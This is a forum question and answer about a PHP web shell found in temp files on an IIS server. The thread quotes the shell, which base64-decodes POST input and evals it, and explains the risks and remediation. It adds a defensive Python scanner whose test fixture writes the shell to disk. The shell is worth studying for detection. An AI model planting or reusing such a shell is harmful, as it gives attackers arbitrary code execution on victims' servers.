PHP code contained in phpXXXX.tmp files in temp directory

I noticed that in our temp directory there are several temporary files with names like phpA3F9.tmp

Looking at the contents, I find a number followed by some PHP code; the following code appears in several files:

9990000 <?php $mujj = $_POST['z']; if ($mujj!="") { $xsser=base64_decode($_POST['z0']); @eval("\$safedg = $xsser;"); } ?> 

This seems to be an attack attempt, but I believe that it relies on the ability of an attacker to execute code in the tmp folder.

Can anyone explain what is going on here? What are the risks? How do these files get into the tmp folder? And how to stop them?

I don't know if this is relevant, but we are running PHP 5.5 on IIS.

1 answer

Story: your server may already have been compromised.

These are PHP shells - basically harmless where they are, but if they get to your web root, they will allow an attacker to execute any arbitrary code on your server.

The key parts for understanding the shell are:

 $xsser=base64_decode($_POST['z0']); @eval("\$safedg = $xsser;"); 

It takes whatever code is in the $_POST variable, base64_decodes it, and then runs it through eval while suppressing any errors.

It is possible that they are uploaded through a form on your website and stored in a temporary folder as an intermediate step, in the hope that they will end up in a web-accessible location. Another option is that your server already has a shell or rootkit on it, and it puts these files in any writable folders it can find.

So what to do about it? Check the server logs: if you see successful requests to scripts that you don't recognize, you may be compromised. Find any upload forms on your site and lock them down (require user authentication, etc.), and then, if you are sure that you have been compromised, do not bother trying to clean it up. Move to a new server: transfer clean code, important files and data to a clean server.

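A defender-side check for the situation described in the question and the answer, added here as an example and not part of the original thread: it scans a temp directory for phpXXXX.tmp files and reports those that combine the three building blocks of the shell shown above (a request-supplied input, a decoder, and an eval). The file-name pattern, the rule set and the sample files are assumptions constructed for this example.

```python
import os
import re
import tempfile

# Detection rules (constructed for this example). A file is reported only
# when all three match: code taken from the request, decoded, then eval'd.
RULES = {
    "dynamic_eval": re.compile(r"@?\b(eval|assert)\s*\(", re.I),
    "request_input": re.compile(r"\$_(POST|GET|REQUEST|COOKIE)\s*\[", re.I),
    "decoder": re.compile(r"\b(base64_decode|gzinflate|str_rot13)\s*\(", re.I),
}
# Assumed name pattern for PHP upload temp files on Windows (phpA3F9.tmp).
TMP_NAME = re.compile(r"^php[0-9A-Za-z]+\.tmp$")

def classify(content: str) -> list:
    """Return the names of the rules that match the file content, in RULES order."""
    return [name for name, rx in RULES.items() if rx.search(content)]

def scan_temp_dir(directory: str) -> list:
    """Return (path, matched_rules) for every phpXXXX.tmp file matching all rules."""
    findings = []
    for name in sorted(os.listdir(directory)):
        if not TMP_NAME.match(name):
            continue
        path = os.path.join(directory, name)
        try:
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                hits = classify(fh.read())
        except OSError:
            continue  # unreadable file: skip rather than abort the scan
        if len(hits) == len(RULES):
            findings.append((path, hits))
    return findings

def build_sample_dir() -> str:
    """Constructed sample: the shell from the question, a benign upload, a non-tmp file."""
    d = tempfile.mkdtemp()
    shell = r"""9990000 <?php $mujj = $_POST['z']; if ($mujj!="") { $xsser=base64_decode($_POST['z0']); @eval("\$safedg = $xsser;"); } ?>"""
    with open(os.path.join(d, "phpA3F9.tmp"), "w") as fh:
        fh.write(shell)
    with open(os.path.join(d, "php1B2C.tmp"), "w") as fh:
        fh.write("<?php echo base64_decode('aGVsbG8='); ?>")  # decoder only, no eval
    with open(os.path.join(d, "notes.txt"), "w") as fh:
        fh.write("eval(base64_decode($_POST['x']))")  # not a phpXXXX.tmp file
    return d

if __name__ == "__main__":
    for path, hits in scan_temp_dir(build_sample_dir()):
        print(f"SUSPECT {path}: {', '.join(hits)}")
```

Point it at the real temp directory (and at the web root) and treat each hit as an indicator to correlate with the request logs the answer tells you to check.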
